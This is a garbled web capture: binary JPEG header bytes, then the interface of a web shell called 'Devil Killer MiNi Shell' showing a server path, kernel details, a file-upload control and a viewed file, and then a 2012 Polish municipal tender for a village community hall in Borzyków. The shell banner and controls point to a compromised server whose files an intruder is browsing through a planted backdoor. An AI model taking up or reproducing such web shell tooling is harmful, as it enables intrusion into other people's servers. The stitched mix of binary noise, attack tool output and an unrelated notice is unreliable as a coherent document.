JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/250002-N-2012.html

<p class="kh_header"><b>Chmielnik: Budowa i wyposażenie budynku świetlicy wiejskiej w Borzykowie, gmina Chmielnik</b><br>
<b>Numer ogłoszenia: 250002 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 3543273, faks 41 3543273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chmielnik.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa i wyposażenie budynku świetlicy wiejskiej w Borzykowie, gmina Chmielnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa budynku świetlicy wiejskiej w Borzykowie, gmina Chmielnik wraz z zakupem wyposażenia. 
Budowa budynku świetlicy wiejskiej obejmuje następujący zakres:

1.BUDYNEK ŚWIETLICY WIEJSKIEJ
Budynek parterowy z dachem wielospadowym o kubaturze 1530 m3, powierzchni użytkowej 261,14 m2, bez podpiwniczenia z nieużytkowym strychem na rzucie wielokąta w kształcie litery L. Konstrukcja budynku mieszana - ściany konstrukcyjne i działowe murowane wzmocnione trzpieniami i słupami żelbetowymi od zewnątrz ocieplone płytami styropianowymi o gr.15 cm. Ławy i stopy fundamentowe żelbetowe, ściany fundamentowe z bloczków betonowych ocieplone od zewnątrz płytami ze styroduru ekstrudowanego (styropianu) gr.15 cm. Strop, belki wieńce i żebra żelbetów w wykonaniu monolitycznym, ocieplony wełną mineralną o gr.25 cm. Dach o konstrukcji drewnianej jętkowej pokryty blachą dachówkową w kolorze ciemny brąz matowy na deskowaniu ażurowym. Obróbki blacharskie z blachy stalowej powlekanej, rynny i rury spustowe z tworzywa sztucznego PCV w kolorze blachodachówki. Posadzki zróżnicowane w zależności od przeznaczenia pomieszczeń: płytki typu Gres, panele podłogowe drewniane i wykładzina z PCV. Parapety wewnętrzne z konglomeratu. Stolarka okienna z PCV, drzwi wewnętrzne drewniane i aluminiowe, drzwi zewnętrzne drewniane i stalowe p. pożarowe. Ściany w. pomieszczeniach w.c. i porządkowym licowane płytkami glazurowanymi do wys.2,00 m, w pomieszczeniu socjalnym przy zlewozmywaku do wys.1,50 m. Tynki zewnętrzne cienkowarstwowe, cokół wokół budynku z tynku żywicznego do wys. 45 cm w kolorze brąz. Tynki wewnętrzne na ścianach i sufitach z gotowej zaprawy tynkarskiej kat.III. Parapety zewnętrzne z blachy stalowej powlekanej- kolor brąz.
Schody i pochylnię z kostki brukowej betonowej gr. 6 cm, schody  obramowane obrzeżem betonowym wys. 30 cm. Obramowanie podjazdu dla osób niepełnosprawnych z palisady zabetonowanej w ścianie fundamentowej. 

Budynek wyposażony będzie w wewnętrzne instalacje: 
- elektryczne, komputerową, sanitarne wod - kan., wentylacji mechanicznej w sali wielofunkcyjnej, C.O. na bazie gazu propan butan ze zbiornika zewnętrznego.

UWAGA! Zamawiający dokonuje zmiany rodzaju materiału stolarki okiennej drewnianej określonej w projekcie na PCV w kolorze białym. Do wyceny należy przyjąć okna PCV białe wyposażone w nawiewniki.

Zamawiający dokonuje zmiany rodzaju materiału na wykonanie schodów i pochylni dla niepełnosprawnych: ze schodów i pochylni na fundamentach z bloczków betonowych obłożonych płytkami typu gres mrozoodporny i antypoślizgowy na: schody i pochylnię z kostki brukowej betonowej gr. 6 cm, schody  obramowane obrzeżem betonowym wys. 30 cm. Obramowanie podjazdu dla osób niepełnosprawnych z palisady zabetonowanej w ścianie fundamentowej. 

2. OGRODZENIE TERENU
Ogrodzenie terenu z siatki stalowej w ramach z kształtowników na słupkach z rur stalowych z zabezpieczeniem antykorozyjnym. Cokół betonowy o wym:20x30cm na fundamencie betonowym o wym:20x80cm-poszerzony cokół i fundament w miejscach słupków. Izolacja powłokowa z roztworów asfaltowych do gruntowania i izolacji.

3. ROBOTY DROGOWE
Roboty drogowe to nawierzchnie: drogi wewnętrznej, parkingu i placu manewrowego, place i chodniki oraz taras przy budynku. Nawierzchnie zróżnicowane w zależności od przeznaczenia, kostka betonowa o gr.8 cm na podsypce cementowo-piaskowej gr.5,0 cm i podbudowie z kruszywa łamanego o gr. 20cm ułożonego na warstwie odsączającej z piasku gr.20cm. Chodniki i place z kostki betonowej o gr.6,0 cm. Obrzeża betonowe o wym.: 6x20 cm na podsypce piaskowej, krawężniki betonowe o wym:15x30 cm na ławie betonowej z oporem z betonu B-10. 
Taras z kostki brukowej wielkowymiarowej. 
Powierzchnia placów, chodników 141 m2, powierzchnia drogi wewnętrznej parkingu i placu manewrowego - 462 m2, taras 120 m2. Nawierzchnie z kostki brukowej betonowej o klasycznym prostokątnym kształcie, tworzących po ułożeniu płaską powierzchnię w kolorze szarym z fragmentami kostki żółtej ( około 20 % ) i czarnej / grafitowej ( około 5 % ) do dekoracji.

4.ZIELEŃ
Zazielenienie terenu to wykonanie trawników na uprzednio rozłożonej ziemi urodzajnej o gr.15 cm (z odzysku). Sadzenie roślinności wysokiej- drzew liściastych - 5 szt. z całkowitą zaprawą dołów ziemią urodzajną z odzysku i zabezpieczenie palikami drewnianymi w ilości 3 szt. na jedno drzewo.
Powierzchnia zieleni urządzonej 682,50 m2.

5. WYPOSAŻENIE TERENU
Wyposażenie terenu - zakup i ustawienie w gruncie ławek parkowych z siedziskami i oparciami drewnianymi  i koszy na odpady.

6. PRZYŁĄCZA: WODOCIĄGOWE i KANALIZACJI SANITARNEJ 
Przyłącze wodociągowe do budynku projektuje się z istniejącej sieci wodociągowej O160 PVC. Zaprojektowano przyłącze z rur i kształtek polietylenowych PE O 50 x 4,7 mm.
Bezpośrednim odbiornikiem ścieków z budynku świetlicy wiejskiej i kotłowni, odprowadzanych przyłączem kanalizacji sanitarnej O 0,16 PCV będzie bezodpływowy zbiornik ścieków - szambo, o obliczonej pojemności V = 6,5 m3.

7. ZBIORNIK BEZODPŁYWOWY NA ŚCIEKI SANITARNE o POJ.V=6,50m3
Bezodpływowy zbiornik na ścieki sanitarne w konstrukcji żelbetowej monolitycznej, beton konstrukcyjny kl.15, beton podłoża kl.10. Zbrojenie stalą żebrowaną o śred.fi 8 i fi 12mm. 

8. PRZYŁĄCZE I MONTAŻ ZBIORNIKA NAZIEMNEGO NA GAZ PŁYNNY PROPAN- BUTAN o POJ. V=2,70 m3.
Zakup i montaż zbiornika poziomego jednokomorowego do gazu propan - butan o poj. V=2,70 m3 wraz z osprzętem, próbą ostateczną, legalizacją instalacji i wyposażeniem przeciwpożarowym oraz transportem do miejsca montażu urządzenia. Przyłącze gazu propan od zbiornika gazu do ściany budynku. 
Instalacja od zbiornika z rur stalowych pionowych, złączek PE/stal w rurach ochronnych, rury O25x3,0 PE ułożone w ziemi aż po rurociąg stalowy na ścianie proj. budynku zakończony kulowym zaworem odcinającym O20 i reduktorem II-go stopnia. 
Ławy fundamentowe pod zbiornik żelbetowe w wykonaniu monolitycznym z betonu B-20 zbrojone prętami ze stali gładkiej, posadowione na podłożu z betonu B-10. 

9. WEWNĘTRZNE INSTALACJE WOD.-KAN., C.W., C.O. Z KOTŁOWNIĄ GAZOWĄ ORAZ INSTALACJE WENTYLACYJNE - zgodnie z projektem budowlano - wykonawczym

10. INSTALACJA ELEKTRYCZNA obejmująca:
Zasilanie i rozdział energii elektrycznej; instalację oświetlenia podstawowego, ewakuacyjnego i kierunkowego, instalację gniazd wtyczkowych 230 V ogólnych; instalacje teletechniczne; instalacje ochrony od porażeń; instalację połączeń wyrównawczych; instalację przepięciową, odgromową i zabezpieczenie przeciwpożarowe w zakresie instalacji elektrycznych.

11. WYPOSAŻENIE ŚWIETLICY WIEJSKIEJ OBEJMUJĄCE NASTĘPUJĄCY ZAKRES:
1) stół 2-osobowy - 55 szt.: w tym 25 szt. stolików ze składanymi nogami;
2) krzesło - 110 szt.;
3) stół roboczy kuchenny - 1 szt.;
4)  meble kuchenne - 1 kpl.;
5)  szafa ubraniowa z półkami - 1 szt.;
6) kuchnia gazowa - 1 szt.;
7) lodówka - 1 szt.;
8) zamrażarka - 1 szt.;
9) okap kuchenny - 1 szt.;
10) mikrofalówka - 1 szt.;
11) czajnik elektryczny - 1 szt.;
12) robot kuchenny- 1 szt.;
13) zaparzacz ( warnik do wody ) - 1 szt.;
14) patelnia elektryczna - 1 szt.;
15) garnek ze stali nierdzewnej - 4 szt.;
16) wieża Hi - Fi - 1 szt.;
17) komputer laptop - 1 szt.;
18) telewizor LCD 1 szt.;
19) odtwarzacz DVD - 1 szt.;
20) komputer stacjonarny - 4 szt.;
21) projektor  multimedialny - 1 szt.;
22) urządzenie wielofunkcyjne - 1 szt.;
23) gra stołowa piłkarzy ki - 1 szt.;
24) stół pingpongowy - 1 szt.;
25) rower treningowy - 1 szt.;
26) bieżnia - 1 szt.;
27) stepper - 1 szt.;
28) ławka do ćwiczeń ze sztangą - 1 szt.;
29) wioślarz do ćwiczeń - 1 szt.;
30) akordeon - 2 szt.;
31) trąbka - 1 szt.;
32) keyboard - 1 szt.;
33) biurko komputerowe - 5 szt.;
34) fotel obrotowy -5 szt.;
35) karnisze - 12 szt.;
36) wieszaki do szatni mocowane do ściany - 1 kpl.;
37) lustra łazienkowe - 4 szt.;
38) pojemniki na papier toaletowy - 4 szt.;
39) kosze łazienkowe na odpady - 6 szt.;
40) kosze na odpady kuchenne - 4 szt.
41) ławka - 2 szt.;
42) kosz na odpady zewnętrzny - 2 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje na podstawie art. 67 ust.1 pkt.6 ustawy Prawo zamówień publicznych udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9, 45.31.00.00-3, 45.33.20.00-3, 45.23.11.10-9, 45.33.11.00-7, 45.33.11.10-0, 45.33.30.00-0, 45.33.12.10-1, 45.23.12.22-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 30 000,00 zł (słownie: trzydzieści tysięcy zł  00/100 ). 
Wadium Wykonawca składa w jednej lub kilku formach wymienionych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium składane w pieniądzu należy wpłacać na rachunek Zamawiającego w BS Chmielnik nr 32 8483 0001 2001 0017 7441 0001 a dowód wniesienia wadium należy dołączyć do oferty lub złożyć w pok. Nr 209 Urzędu Miasta i Gminy w Chmielniku, Plac Kościuszki 7.
W przypadku wadium wnoszonego w formie niepieniężnej należy dołączyć do oferty lub złożyć w pok. Nr 209 Urzędu Miasta i Gminy w Chmielniku, Plac Kościuszki 7
Zwrot czy zatrzymanie wadium  nastąpi zgodnie z art. 46 Prawa zamówień publicznych.
Zgodnie z art. 46 ust. 4a Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni posiadać zarejestrowaną działalność gospodarczą w zakresie robót budowlanych.
Zamawiający dokona oceny na podstawie oświadczenia, o którym mowa w art. 44 ustawy PZP. Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeśli wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną polegającą na wykonaniu robót zbliżonych swoim zakresem do przedmiotu zamówienia, przez co rozumie się wybudowanie obiektu budowlanego kubaturowego o wartości co najmniej 1 mln zł. z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączy dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeżeli wykaże, że dysponuje osobami posiadającymi  uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie  do kierowania robotami  - zgodnie z przepisami ustawy Prawo budowlane ( Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm. ) w specjalności  gazowej, elektrycznej i wodociągowo - kanalizacyjnej, a w szczególności kierownikiem budowy posiadającym uprawnienia budowlane  i  należącym do Okręgowej Izby Inżynierów Budownictwa.

Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykaże że:
- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
- posiada środki finansowe lub zdolność kredytową w wysokości minimum 1 mln zł. 
Ocena spełnienia warunków udziału w postępowaniu dokonana będzie wg formuły spełnia lub nie spełnia, na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz ofertowy; 
2. Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ust. 2 ustawy; 
3. Kosztorys ofertowy sporządzony w oparciu o dokumentację projektową, specyfikację techniczną warunków wykonania i odbioru robót i specyfikację techniczną elementów wyposażenia świetlicy ;
4. Harmonogram rzeczowo - finansowy; 
5. Oświadczenie o podwykonawcach; 
6. Dowód wniesienia wadium.</p>
